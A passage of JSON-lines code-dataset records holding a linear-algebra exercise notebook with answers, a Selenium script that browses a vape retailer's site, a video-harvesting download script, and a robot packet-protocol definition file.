column vector v\n w = Matrix([-3,-4]) # 2x1 column vector w\n\n '''\n '''\n\n # a)\n A*v\n\n '''\n '''\n\n # b)\n B*v\n\n '''\n '''\n\n # c)\n A*B*v\n\n '''\n '''\n\n # d)\n B*A*v\n\n '''\n '''\n\n # e)\n A*w\n\n '''\n '''\n\n # f)\n B*w\n\n '''\n '''\n\n '''\n ### E2.3\n \n Find the components $v_1$ and $v_2$ of the vector $\\vec{v} =\\begin{bsmallmatrix}v_1 \\\\ v_2\\end{bsmallmatrix}$ so that $E\\vec{v} = 3 \\vec{e}_2 - 2\\vec{e}_1$, where $E$ is the following matrix:\n \n $$\n E\n = \\;\n \\begin{bmatrix}\n | & | \\\\\n \\vec{e}_1 & \\vec{e}_2 \\\\\n | & | \n \\end{bmatrix}\\!.\n $$\n \n \n #### Answer\n $v_1=-2$, $v_2=3$.\n '''\n\n '''\n '''\n\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ## Vector operations\n '''\n\n '''\n '''\n\n '''\n ### E2.4\n \n Given the vectors $\\vec{u}=(1,1,0)$ and $\\vec{v}=(0,0,3)$, compute the following vector expressions: \n **a)** $\\vec{u}+\\vec{v}$ **b)** $\\vec{u}-\\vec{v}$ **c)** $3\\vec{u}+\\vec{v}$ **d)** $\\| \\vec{u} \\|$\n \n \n #### Answer\n **a)** $(1,1,3)$; **b)** $(1,1,-3)$; **c)** $(3,3,3)$; **d)** $\\sqrt{2}$.\n '''\n\n '''\n '''\n\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ### E2.5\n \n Given $\\vec{v}= (1, 2, 3)$ and $\\vec{w}=(0, 1, 1)$, compute the following vector products:\n \n - **a)** $\\vec{v} \\cdot \\vec{w}$;\n - **b)** $\\vec{v} \\times \\vec{w}$;\n - **c)** $\\vec{w} \\times \\vec{v}$;\n - **d)** $\\vec{w} \\times \\vec{w}$. \n \n #### Answer\n **a)** $5$; **b)** $(-1, -1, 1)$; **c)** $(1,1,-1)$; **d)** $(0, 0, 0)$.\n '''\n\n '''\n '''\n\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ### E2.6 \n \n \n For each of the following vectors, $\\vec{v}_1 = 10\\angle 10^{\\circ}$, $\\vec{v}_2 = 10\\angle 30^{\\circ}$, $\\vec{v}_3 = 10\\angle 60^{\\circ}$, $\\vec{v}_4 = 10\\angle 120^{\\circ}$, complete the following tasks: \n \n - a) Draw the vector in a Cartesian plane. \n - b) Compute the vector's $x$- and $y$-coordinates. \n - c) Compute the projection of the vector in the direction $\\hat{\\imath}$. Your answer should be a vector quantity. \n - d) Compute the projection of the vector in the direction $\\hat{\\jmath}$. \n - e) Compute the projection of the vector in the direction $\\vec{d}=(1,1)$, and find the length of the projection. \n \n **Hint**: Recall the formula for the projection of the vector $\\vec{v}$ in the direction $\\vec{d}$ is defined as $\\Pi_{\\vec{d}}(\\vec{v}) = \\Big(\\frac{ \\vec{d}\\,\\cdot \\, \\vec{v} }{ \\|\\vec{d}\\|^2 } \\Big) \\vec{d}$. \n \n #### Answer\n \n \n - a) This part has been omitted for brevity. \n - b) $\\vec{v}_1 = (9.848, 1.736)$; $\\vec{v}_2 = (8.66, 5)$; $\\vec{v}_3 = (5, 8.66)$; $\\vec{v}_4 = (-5, 8.66)$. \n - c) $\\Pi_{\\hat{\\imath}}(\\vec{v}_1) = 9.848$; $\\Pi_{\\hat{\\imath}}(\\vec{v}_2) = 8.66$; $\\Pi_{\\hat{\\imath}}(\\vec{v}_3) = 5$; $\\Pi_{\\hat{\\imath}}(\\vec{v}_4) = -5$. \n - d) $\\Pi_{\\hat{\\jmath}}(\\vec{v}_1) = 1.736$; $\\Pi_{\\hat{\\jmath}}(\\vec{v}_2) = 5$; $\\Pi_{\\hat{\\jmath}}(\\vec{v}_3) = 8.66$; $\\Pi_{\\hat{\\jmath}}(\\vec{v}_4) = 8.66$. \n - e) $\\Pi_{\\vec{d}}(\\vec{v}_1) = (5.79, 5.79)$ and $\\| \\Pi_{\\vec{d}}(\\vec{v}_1) \\| = 8.19$; $\\Pi_{\\vec{d}}(\\vec{v}_2) = (6.83,6.83)$ and $\\| \\Pi_{\\vec{d}}(\\vec{v}_2) \\| = 9.66$; $\\Pi_{\\vec{d}}(\\vec{v}_3) = (6.83,6.83)$ and $\\| \\Pi_{\\vec{d}}(\\vec{v}_3) \\| = 9.66$; $\\Pi_{\\vec{d}}(\\vec{v}_4) = (1.83,1.83)$ and $\\| \\Pi_{\\vec{d}}(\\vec{v}_4) \\| = 2.59$. \n '''\n\n '''\n '''\n\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ## Matrix operations\n '''\n\n '''\n '''\n\n '''\n ### E2.7\n \n \n Given the matrices $A = \\begin{bsmallmatrix} 3 & 4 \\\\ 2 & 1 \\end{bsmallmatrix}$, $B = \\begin{bsmallmatrix} -1 & 0 & 1 & 2 \\\\ 4 & 3 & 2 & 1 \\end{bsmallmatrix}$, and $C = \\begin{bsmallmatrix} -2 & 3 & \\,0 \\\\ 2 & \\!-2 & \\,1\\end{bsmallmatrix}$, compute the expressions. \n \n - a) $A^{\\mathsf{T}}$\n - b) $C^{\\mathsf{T}}$\n - c) $A^2$\n - d) $AB$\n - e) $AC$\n - f) $BA$\n - g) $C^{\\mathsf{T}} \\!A$\n - h) $\\det(A)$\n - i) $\\det(B)$\n - j) $\\det(C)$\n - k) $\\det(A^{\\mathsf{T}})$\n - l) $\\det(AA^{-1})$\n - m) $\\textup{Tr}(A)$\n - n) $\\textup{Tr}(A^{\\mathsf{T}})$\n \n **Hint**: Some of these expressions may not exist. \n \n #### Answer\n \n \n - a) $\\begin{bsmallmatrix}3 & 2\\\\ 4 & 1\\end{bsmallmatrix}$; \n - b) $\\begin{bsmallmatrix}-2 & 2\\\\3 & -2\\\\0 & 1\\end{bsmallmatrix}$; \n - c) $\\begin{bsmallmatrix}17 & 16\\\\8 & 9\\end{bsmallmatrix}$; \n - d) $\\begin{bsmallmatrix}13 & 12 & 11 & 10\\\\2 & 3 & 4 & 5\\end{bsmallmatrix}$; \n - e) $\\begin{bsmallmatrix}2 & 1 & 4\\\\-2 & 4 & 1\\end{bsmallmatrix}$; \n - f) Doesn't exist; \n - g) $\\begin{bsmallmatrix}-2 & -6\\\\5 & 10\\\\2 & 1\\end{bsmallmatrix}$; \n - h) $-5$; \n - i) Doesn't exist; \n - j) Doesn't exist; \n - k) $-5$; \n - l) $1$; \n - m) $4$; \n - n) $4$. \n '''\n\n '''\n '''\n\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ### E2.8\n \n Given the $1\\times 3$ matrices (row vectors) $\\vec{u} = (1,2,3)$ and $\\vec{v} = (2,-1,0)$, compute the following products: \n \n - a) $\\vec{u}\\,\\vec{u}^{\\mathsf{T}}$\n - b) $\\vec{v}\\,\\vec{v}^{\\mathsf{T}}$\n - c) $\\vec{u}\\,\\vec{v}^{\\mathsf{T}}$\n - d) $\\vec{u}^{\\mathsf{T}} \\vec{u}$\n - e) $\\vec{v}^{\\mathsf{T}} \\vec{v}$\n - f) $\\vec{u}^{\\mathsf{T}} \\vec{v}$\n \n **Hint**: The transpose of a $1 \\times 3$ row vector is a $3\\times 1$ column vector. \n \n #### Answer\n \n \n - a) $14$; \n - b) $5$; \n - c) $0$; \n - d) $\\begin{bsmallmatrix}1 & 2 & 3\\\\2 & 4 & 6\\\\3 & 6 & 9\\end{bsmallmatrix}$; \n - e) $\\begin{bsmallmatrix}4 & -2 & 0\\\\-2 & 1 & 0\\\\0 & 0 & 0\\end{bsmallmatrix}$; \n - f) $\\begin{bsmallmatrix}2 & -1 & 0\\\\4 & -2 & 0\\\\6 & -3 & 0\\end{bsmallmatrix}$. \n '''\n\n '''\n '''\n\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ### E2.9\n \n Find the unknowns $\\alpha$ and $\\beta$ in the equation $\\begin{bsmallmatrix}2 & \\alpha \\\\ \\beta & -3\\end{bsmallmatrix}\n \\begin{bsmallmatrix}1 \\\\[0.5mm] 4\\end{bsmallmatrix}=\\begin{bsmallmatrix}0 \\\\[0.5mm] 0\\end{bsmallmatrix}$. \n \n #### Answer\n $\\alpha=-\\frac{1}{2}$and $\\beta = 12$.\n '''\n\n '''\n '''\n\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ## Linearity\n '''\n\n '''\n '''\n\n '''\n ### E2.10\n \n Are these expressions linear in the variables $x$, $y$, and $z$?\n \n - a) $2x+5y + \\sqrt{m}z$\n - b) $10\\sqrt{x} + 2(y+z)$\n - c) $42x + a^2\\sin(\\frac{\\pi}{3})y + z\\cos(\\frac{\\pi}{3})$\n \n #### Answer\n \n \n - a) Yes; \n - b) No; \n - c) Yes. \n \n #### Solution\n An expression is linear in the variable $v$ if it contains $v$ raised only to the first power. This is the case for the first and third expressions but not the second, since it contains $\\sqrt{x} = x^{\\frac{1}{2}}$. \n '''\n\n '''\n '''\n\n x, y, z, m, a = symbols('x y z m a')\n alpha, beta, gamma = symbols(r'\\alpha \\beta \\gamma')\n\n '''\n '''\n\n # a)\n expra = 2*x + 5*y + sqrt(m)*z\n expra.subs({\"x\":alpha*x, \"y\":0, \"z\":0}) == alpha*expra.subs({\"x\":x, \"y\":0, \"z\":0})\n\n '''\n '''\n\n '''\n So `expra` is linear in $x$.\n '''\n\n '''\n '''\n\n expra.subs({\"x\":0, \"y\":beta*y, \"z\":0}) == beta * expra.subs({\"x\":0, \"y\":y, \"z\":0})\n\n '''\n '''\n\n ...\n\n '''\n '''\n\n\n '''\n '''\n\n","repo_name":"minireference/noBSLAnotebooks","sub_path":"aspynb/chapter02_exercises.py","file_name":"chapter02_exercises.py","file_ext":"py","file_size_in_byte":9398,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"53"} +{"seq_id":"70827716008","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n# from selenium.webdriver.chrome.options import Options as COptions\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport random\nfrom random import gauss\nimport time\nimport re\nimport sys\n\noptions = webdriver.ChromeOptions()\noptions.accept_untrusted_certs = True\noptions.assume_untrusted_cert_issuer = True\noptions.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\noptions.add_argument(f\"--user-agent=Mozilla/5.0 (Linux; Android 8.0.0; PRA-TL10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36\")\noptions.add_argument(f\"--window-size=1080,1920\")\noptions.add_argument(\"--disable-extensions\")\noptions.add_argument(\"--disable-infobars\")\noptions.add_argument(\"--disable-popup-blocking\")\noptions.add_argument(\"--ignore-certificate-errors\")\noptions.add_argument(\"--disable-session-crashed-bubble\")\noptions.add_argument(\"--enable-javascript\")\noptions.add_argument(\"--cache-control=max-age=0\")\n\nchrome = webdriver.Remote(\n command_executor=f'http://localhost:4444/wd/hub',\n desired_capabilities=options.to_capabilities())\nchrome.implicitly_wait(30)\ntime.sleep(abs((gauss(1, 1) * 550 + 3500))/1000)\nchrome.get(\"https://vapejuicedepot.com/products/fogg-pod-juice-jewel-mint-disposable-pod\")\n\nelement = chrome.find_elements_by_id(\"bouncer_modal_submit\")\nif len(element) > 0 and element[0].is_displayed(): \n element[0].click()\nelse: \n time.sleep(1)\nchrome.execute_script(\"window.scrollTo(0, 2000)\") \ntime.sleep(3) \nchrome.execute_script(\"window.scrollTo(0, 20)\")\ntime.sleep(3)\nmenu_list = [\"NEW ARRIVALS\",\"E-LIQUIDS\",\"DEVICES\",\"E-LIQUIDS\",\"ALL BRANDS\",\"DEALS & SALE\",\"CONTACT US\",\"HOME\"]\nmenu_item = random.choice(menu_list)\nprint(menu_item)\ntime.sleep(3)\nchrome.find_element_by_xpath('//*[@id=\"section-header\"]/div/div[1]/button').click()\ntime.sleep(10)\nchrome.find_element_by_xpath(f\"//a[text()='{menu_item}']\").click()\ntime.sleep(10) \nchrome.execute_script(\"window.scrollTo(0, 2000)\")\ntime.sleep(10)\nchrome.execute_script(\"window.scrollTo(0, 20)\")\ntime.sleep(10)","repo_name":"babkenmes/crawler","sub_path":"selenium/node_scripts/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30871479728","text":"import os\nfrom rq import Queue\nfrom redis import Redis\n\nfrom shows import shows_dict, vod_base_url, base_url, get_available_episodes\n#from shows import shows_dict, vod_base_url, base_url, get_parsed_html, search_for_links\nfrom web_driver_dependencies import *\nfrom general_utils import force_quit_browser_silently, db_connect\nfrom download_helpers import async_logic, check_if_show_is_needed\n\n\nredis_conn = Redis(host=os.environ[\"REDIS_HOST\"], port=6379)\nq = Queue(connection=redis_conn)\n\ndef main():\n\n for show, directory in shows_dict.items():\n # Create webdriver\n #driver = webdriver.Chrome(DRIVER_LOCATION, chrome_options=chrome_options)\n driver = webdriver.Chrome(options=chrome_options)\n\n # Open web page\n driver.get(vod_base_url+show)\n\n # Parse web page and grab html block that has relevant urls\n print(\"Looking For Episodes of:\", shows_dict[show])\n print(vod_base_url+show +\"\\n\") # This maybe needs to go in the parser.\n episodes = get_available_episodes(show, vod_base_url, base_url, driver)\n \n # Close webdriver\n driver.quit()\n\n if not episodes:\n continue\n\n # Search for existence of show in database. If not found, download.\n for episode in episodes:\n if check_if_show_is_needed(show, episode):\n print(\"[ ]:\", episode['title'])\n # Start download, write nfo and add to database.\n q.enqueue_call(func=async_logic,\n args=(show, episode),\n timeout=\"10m\")\n else:\n print(\"[x]:\", episode['title'])\n\n print(\"\\n\")\n\n driver.quit()\n #force_quit_browser_silently()\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n exit()\n except Exception as e:\n print(\"Main Exception Catcher\")\n print(str(e))\n print('Exception caught, type is:', e.__class__.__name__)\n force_quit_browser_silently()\n exit()\n","repo_name":"sulaiman-allen/video_harvester","sub_path":"video_harvester.py","file_name":"video_harvester.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18598647935","text":"# encoding: utf-8\n\nimport math\nimport inspect\nimport types\nimport struct\nimport sys\n\nimport position\nfrom binarizer import *\nfrom definitions import *\n\n\n\n\n# Atari 256 color palette\nCOLORS = [\"#000000\", \"#412000\", \"#451904\", \"#5d1f0c\", \"#4a1700\", \"#490036\", \"#48036c\", \"#051e81\", \"#0b0779\", \"#1d295a\", \"#004b59\", \"#004800\", \"#164000\", \"#2c3500\", \"#463a09\", \"#401a02\",\n \"#252525\", \"#542800\", \"#721e11\", \"#7a240d\", \"#721f00\", \"#66004b\", \"#5c0488\", \"#0626a5\", \"#201c8e\", \"#1d3876\", \"#005d6e\", \"#005400\", \"#1c5300\", \"#384400\", \"#4d3f09\", \"#581f05\",\n \"#343434\", \"#763700\", \"#9f241e\", \"#982c0e\", \"#a81300\", \"#80035f\", \"#650d90\", \"#082fca\", \"#3531a3\", \"#1d4892\", \"#006f84\", \"#036b03\", \"#236600\", \"#445200\", \"#544509\", \"#702408\",\n \"#4e4e4e\", \"#9a5000\", \"#b33a20\", \"#b02f0f\", \"#c8210a\", \"#950f74\", \"#7b23a7\", \"#263dd4\", \"#4642b4\", \"#1d5cac\", \"#00849c\", \"#0e760e\", \"#287800\", \"#495600\", \"#6c5809\", \"#8d3a13\",\n \"#686868\", \"#c36806\", \"#c85120\", \"#bf3624\", \"#df2512\", \"#aa2288\", \"#933bbf\", \"#444cde\", \"#5753c5\", \"#1d71c6\", \"#0099bf\", \"#188018\", \"#2e8c00\", \"#607100\", \"#907609\", \"#ab511f\",\n \"#757575\", \"#e47b07\", \"#e36920\", \"#d34e2a\", \"#ec3b24\", \"#ba3d99\", \"#9d45c9\", \"#4f5aec\", \"#615dcf\", \"#3286cf\", \"#00abca\", \"#279227\", \"#3a980c\", \"#6c7f00\", \"#ab8b0a\", \"#b56427\",\n \"#8e8e8e\", \"#ff911a\", \"#fc8120\", \"#e7623e\", \"#fa5236\", \"#ca4da9\", \"#a74fd3\", \"#5a68ff\", \"#6d69db\", \"#489bd9\", \"#00bcde\", \"#36a436\", \"#47a519\", \"#798d0a\", \"#c1a120\", \"#bf7730\",\n \"#a4a4a4\", \"#ffab1d\", \"#fd8c25\", \"#f36e4a\", \"#fc6148\", \"#d75ab6\", \"#b25ade\", \"#6575ff\", \"#7b77e9\", \"#4ea8ec\", \"#00d0f5\", \"#4eb94e\", \"#51af23\", \"#8b9f1c\", \"#d0b02f\", \"#d0853a\",\n \"#b8b8b8\", \"#ffc51f\", \"#fe982c\", \"#fd7854\", \"#ff705f\", \"#e467c3\", \"#bd65e9\", \"#7183ff\", \"#8985f7\", \"#55b6ff\", \"#10dcff\", \"#51cd51\", \"#5cba2e\", \"#9eb22f\", \"#debe3d\", \"#e19344\",\n \"#c5c5c5\", \"#ffd03b\", \"#ffae38\", \"#ff8a6a\", \"#ff7e7e\", \"#ef72ce\", \"#c56df1\", \"#8091ff\", \"#918dff\", \"#69caff\", \"#3ee1ff\", \"#72da72\", \"#71cf43\", \"#abbf3c\", \"#e6c645\", \"#eda04e\",\n \"#d0d0d0\", \"#ffd84c\", \"#ffb946\", \"#ff987c\", \"#ff8f8f\", \"#fb7eda\", \"#ce76fa\", \"#90a0ff\", \"#9c98ff\", \"#74cbff\", \"#64e7ff\", \"#7ce47c\", \"#85e357\", \"#b8cc49\", \"#edcd4c\", \"#f9ad58\",\n \"#d7d7d7\", \"#ffe651\", \"#ffbf51\", \"#ffa48b\", \"#ff9d9e\", \"#ff8de1\", \"#d583ff\", \"#97a9ff\", \"#a7a4ff\", \"#82d3ff\", \"#76eaff\", \"#85ed85\", \"#8deb5f\", \"#c2d653\", \"#f5d862\", \"#fcb75c\",\n \"#e1e1e1\", \"#fff456\", \"#ffc66d\", \"#ffb39e\", \"#ffabad\", \"#ff9de5\", \"#da90ff\", \"#9fb2ff\", \"#b2afff\", \"#8ddaff\", \"#8bedff\", \"#99f299\", \"#97f569\", \"#cde153\", \"#fbe276\", \"#ffc160\",\n \"#eaeaea\", \"#fff970\", \"#ffd587\", \"#ffc2b2\", \"#ffb9bd\", \"#ffa5e7\", \"#de9cff\", \"#afbeff\", \"#bbb8ff\", \"#9fd4ff\", \"#9aefff\", \"#b3f7b3\", \"#a0fe72\", \"#dbef6c\", \"#fcee98\", \"#ffca69\",\n \"#f4f4f4\", \"#ffff90\", \"#ffe498\", \"#ffd0c3\", \"#ffc7ce\", \"#ffafea\", \"#e2a9ff\", \"#c0cbff\", \"#c3c1ff\", \"#b4e2ff\", \"#b1f3ff\", \"#c3f9c3\", \"#b1ff8a\", \"#e8fc79\", \"#fdf3a9\", \"#ffcf7e\",\n \"#ffffff\", \"#ffffaa\", \"#ffe6ab\", \"#ffdad0\", \"#ffcade\", \"#ffb8ec\", \"#e6b6ff\", \"#cdd3ff\", \"#d3d1ff\", \"#c0ebff\", \"#c7f6ff\", \"#cdfccd\", \"#bcff9a\", \"#f2ffab\", \"#fdf3be\", \"#ffda96\"]\n\n\n\n\n################################################################################\n# Specific item types\n\n\n\n\nclass ShortAsFloat(Float):\n\n C_TYPE = 'h'\n DESCRIPTION = \"4 bytes real (float) stored in a short\"\n\n def __init__(self, default_value, description = None):\n AbstractItem.__init__(self, default_value, description)\n\n\n def serialize(self, value, buf):\n buf.append(int(value * 10000.0))\n\n\n def deserialize(self, iterator):\n return float(next(iterator)) / 10000.0\n\n\n\n\nclass Point(Struct):\n\n DESCRIPTION = \"Field coordinates\"\n\n def __init__(self, description = None):\n Struct.__init__(self, position.Pose, description,\n ('x', ShortAsFloat(0.0, \"X coordinate\")),\n ('y', ShortAsFloat(0.0, \"Y coordinate\")),\n )\n\n\n\n\nclass Pose(Struct):\n\n DESCRIPTION = \"Pose\"\n\n def __init__(self, description = None):\n Struct.__init__(self, position.Pose, description,\n ('x', Float(0.0, \"X coordinate\")),\n ('y', Float(0.0, \"Y coordinate\")),\n ('angle', Float(0.0, \"Angle\")),\n )\n\n\n\n\nclass OptionalAngle(AbstractItem):\n\n C_TYPE = 'Bf'\n DESCRIPTION = \"Optional angle\"\n\n def __init__(self, default_value, description = None):\n AbstractItem.__init__(self, default_value, description)\n\n\n def serialize(self, value, buf):\n if value is not None:\n buf.append(1)\n buf.append(value)\n else:\n buf.append(0)\n buf.append(-1100000.0)\n\n\n def deserialize(self, iterator):\n use_angle = next(iterator)\n angle = next(iterator)\n if not use_angle:\n angle = None\n return angle\n\n\n def to_dump(self, value):\n if value is None:\n return str(None)\n return \"{:0.4f}\".format(value)\n\n\n\n\n################################################################################\n# Base packet class\n\n\n\n\nclass BasePacket(object):\n\n MAX_SIZE = 256\n DEFINITION = ()\n DESCRIPTION = \"\"\n LOGVIEW_DEFAULT_ENABLED = True\n STRUCT = None\n BIN_STRUCT = None\n HANDLER_METHODS = None\n\n @classmethod\n def static_init(cls):\n if cls.STRUCT is None:\n cls.BIN_STRUCT = Struct(StructInstance, \"\", *cls.DEFINITION)\n fmt = \" 0:\n fmt += str(pad_size) + \"x\"\n cls.STRUCT = struct.Struct(fmt)\n\n if cls.HANDLER_METHODS is None:\n packet_method = \"on\"\n for c in cls.__name__:\n if c.isupper():\n packet_method += \"_\" + c.lower()\n else:\n packet_method += c\n cls.HANDLER_METHODS = [ packet_method, 'on_packet' ]\n\n @property\n def name(self):\n return self.__class__.__name__\n\n\n def __init__(self, *args, **kwargs):\n values_iter = None\n if len(args) != 0 and type(args[0]) != tuple:\n values_iter = iter(args)\n for name, item in self.DEFINITION:\n value = None\n if values_iter is None:\n for aname, avalue in args:\n if name == aname:\n value = avalue\n break\n else:\n try:\n value = next(values_iter)\n except StopIteration:\n values_iter = None\n if value is None:\n if name in kwargs:\n value = kwargs[name]\n else:\n # Call the constructor of the value to duplicate it. This is necessary for lists\n value = copy.deepcopy(item.default_value)\n setattr(self, name, value)\n\n\n def serialize(self):\n args = [ self.TYPE ]\n self.BIN_STRUCT.serialize(self, args)\n try :\n return self.STRUCT.pack(*args)\n except Exception as e :\n raise Exception(\"Error while serializing packet of type {} : {}\".format(self.name, e))\n\n\n def deserialize(self, buf):\n unpacked = self.STRUCT.unpack(buf)\n it = iter(unpacked)\n # pop the type\n next(it)\n self.BIN_STRUCT.deserialize_to(self, it)\n\n\n def serialize_as_text(self):\n return self.name + self.BIN_STRUCT.serialize_as_text(self)\n\n\n def to_dump(self):\n return self.BIN_STRUCT.to_dump(self)\n\n\n def dispatch_generator(self, obj):\n for method in self.HANDLER_METHODS:\n if hasattr(obj, method):\n g = getattr(obj, method)(self)\n if isinstance(g, types.GeneratorType):\n yield from g\n\n\n def dispatch(self, obj):\n for method in self.HANDLER_METHODS:\n if hasattr(obj, method):\n getattr(obj, method)(self)\n\n\n################################################################################\n# Packet type ranges\n\nCOLORDET_RANGE_START = 1\nCOLORDET_RANGE_END = 32\nTURRET_RANGE_START = COLORDET_RANGE_END\nTURRET_RANGE_END = 50\nPIC32_RANGE_START = TURRET_RANGE_END\nPIC32_RANGE_END = 150\nSIMULATOR_RANGE_START = PIC32_RANGE_END\nSIMULATOR_RANGE_END = 200\nINTERBOT_RANGE_START = SIMULATOR_RANGE_END\nINTERBOT_RANGE_END = 230\nINTERNAL_RANGE_START = INTERBOT_RANGE_END\nINTERNAL_RANGE_END = 256\n\n################################################################################\n# Packet classes\n\n\n# Process packets\n\n\nclass DisableScan(BasePacket):\n\n TYPE = 1\n\n\n\n\nclass SetLogPrefix(BasePacket):\n\n TYPE = 2\n DEFINITION = (\n ('prefix', String(128)),\n )\n\n\n\n\nclass ColorDetected(BasePacket):\n\n TYPE = 3\n DEFINITION = (\n ('color' , UEnum8(COLOR, COLOR_NONE)),\n )\n\n\nclass EnableScan(BasePacket):\n\n TYPE = 4\n\n\n\n# Turret packets\n\n\nclass TurretDetect(BasePacket):\n\n MAX_SIZE = 4\n TYPE = 32\n DEFINITION = (\n ('distance', UEnum8(OPPONENT_DISTANCE, OPPONENT_DISTANCE_NEAR)),\n ('angle' , UInt8 (0, \"Detection angle index (0 <= angle <= 17; 20 deg resolution)\")),\n ('robot' , UEnum8(OPPONENT_ROBOT, OPPONENT_ROBOT_MAIN)),\n )\n\n\n\n\nclass TurretInit(BasePacket):\n\n MAX_SIZE = 4\n TYPE = 33\n DEFINITION = (\n ('mode' , UEnum8(TURRET_INIT_MODE, TURRET_INIT_MODE_READ)),\n ('short_distance', UInt8 (0, \"Short distance detection range\")),\n ('long_distance' , UInt8 (0, \"Long distance detection range\")),\n )\n\n\n\n\nclass TurretDistances(BasePacket):\n\n MAX_SIZE = 3\n TYPE = 34\n DEFINITION = (\n ('short_distance', UInt8 (0, \"Short distance detection range\")),\n ('long_distance' , UInt8 (0, \"Long distance detection range\")),\n )\n\n\n\n\nclass TurretBoot(BasePacket):\n\n MAX_SIZE = 1\n TYPE = 35\n\n\n# PIC 32 packets\n\n\nclass Reinitialize(BasePacket):\n\n TYPE = 50\n\n\n\n\nclass ControllerReady(BasePacket):\n\n TYPE = 51\n LOGVIEW_DEFAULT_ENABLED = True\n\n\n\n\nclass DeviceBusy(BasePacket):\n\n TYPE = 52\n DEFINITION = (\n ('remote_device', UEnum8(REMOTE_DEVICE, REMOTE_DEVICE_PIC)),\n )\n\n\n\n\nclass DeviceReady(BasePacket):\n\n TYPE = 53\n DEFINITION = (\n ('team', UEnum8(TEAM , TEAM_UNKNOWN )),\n ('remote_device', UEnum8(REMOTE_DEVICE, REMOTE_DEVICE_PIC)),\n )\n\n\n\n\nclass Start(BasePacket):\n\n TYPE = 54\n DEFINITION = (\n ('team', UEnum8(TEAM, TEAM_UNKNOWN)),\n )\n\n\n\n\nclass Rotate(BasePacket):\n\n TYPE = 55\n DEFINITION = (\n ('direction', Enum8(DIRECTION, DIRECTION_AUTO)),\n ('angle' , Float(0.0, \"Destination angle\")),\n )\n\n\n\n\nclass MoveCurve(BasePacket):\n\n TYPE = 56\n DEFINITION = (\n ('direction', Enum8 (DIRECTION, DIRECTION_FORWARD)),\n ('angle' , OptionalAngle(None, \"Destination angle\")),\n ('points' , List (62, Point(), [], \"List of points to follow\")),\n )\n\n\n\n\nclass MoveLine(BasePacket):\n\n TYPE = 57\n DEFINITION = (\n ('direction', Enum8(DIRECTION, DIRECTION_FORWARD)),\n ('points' , List (63, Point(), [], \"List of points to follow\")),\n )\n\n\n\n\nclass MoveArc(BasePacket):\n\n TYPE = 58\n DEFINITION = (\n ('direction', Enum8(DIRECTION, DIRECTION_FORWARD)),\n ('center' , Point()),\n ('radius' , Float(0.0, \"Arc radius\")),\n ('points' , List (61, Float(0.0), [], \"List of points to follow\")),\n )\n\n\n\n\nclass GotoStarted(BasePacket):\n\n TYPE = 59\n\n\n\n\nclass WaypointReached(BasePacket):\n\n TYPE = 60\n\n DEFINITION = (\n ('current_point_index', UInt8(0, \"Reached waypoint index\")),\n ('current_pose' , Pose (\"Current robot pose\")),\n )\n\n\n\n\nclass GotoFinished(BasePacket):\n\n TYPE = 61\n DEFINITION = (\n ('reason' , UEnum8(REASON, REASON_DESTINATION_REACHED)),\n ('current_pose' , Pose (\"Robot pose at the end of the movement\")),\n ('current_point_index', UInt8 (0, \"Last reached point index of the point list given in the Goto packet\")),\n )\n\n\n\n\nclass EnableAntiBlocking(BasePacket):\n\n TYPE = 62\n\n\n\n\nclass DisableAntiBlocking(BasePacket):\n\n TYPE = 63\n\n\n\n\nclass KeepAlive(BasePacket):\n\n TYPE = 64\n LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('current_pose' , Pose (\"Current robot pose\")),\n ('match_started', Bool (False, \"Flag defining if the match has already started\")),\n ('match_time' , UInt32(0, \"Time elapsed since the start of the match\")),\n )\n\n\n\n\nclass PositionControlConfig(BasePacket):\n\n TYPE = 65\n DEFINITION = (\n ('ratio_acc' , Float(0.0)),\n ('ratio_decc' , Float(0.0)),\n ('ratio_acc_rot' , Float(0.0)),\n ('ratio_decc_rot', Float(0.0)),\n ('vmax_limit' , Float(0.0)),\n )\n\n\n\n\nclass Stop(BasePacket):\n\n TYPE = 66\n\n\n\n\nclass Resettle(BasePacket):\n\n TYPE = 67\n DEFINITION = (\n ('axis' , UEnum8 (AXIS, AXIS_X)),\n ('position', Float (0.0, \"Robot position on the given axis\")),\n ('angle' , FloatRadian(0.0, \"Robot angle\")),\n )\n\n\n\n\nclass StopAll(BasePacket):\n\n TYPE = 68\n\n\n\n\nclass ServoControl(BasePacket):\n\n TYPE = 69\n DEFINITION = (\n ('type', UEnum8(ACTUATOR_TYPE, ACTUATOR_TYPE_SERVO_AX)),\n ('id', UInt8 (0, \"Servo identifier\")),\n ('command', UEnum8(SERVO_COMMAND, SERVO_COMMAND_MOVE)),\n ('value', UInt16(0, \"Destination angle [0, 300]\")),\n ('timeout', UInt32(0, \"Timeout in ms\")),\n ('status', UEnum8(SERVO_STATUS, SERVO_STATUS_TIMED_OUT)),\n )\n\n\n\n\nclass RelayControl(BasePacket):\n\n TYPE = 70\n DEFINITION = (\n ('id', UInt8 (0, \"Relay identifier\")),\n ('action', UEnum8(ACTION, ACTION_OFF)),\n )\n\n\n\n\nclass PwmControl(BasePacket):\n\n TYPE = 71\n DEFINITION = (\n ('id', UInt8 (0, \"PWM 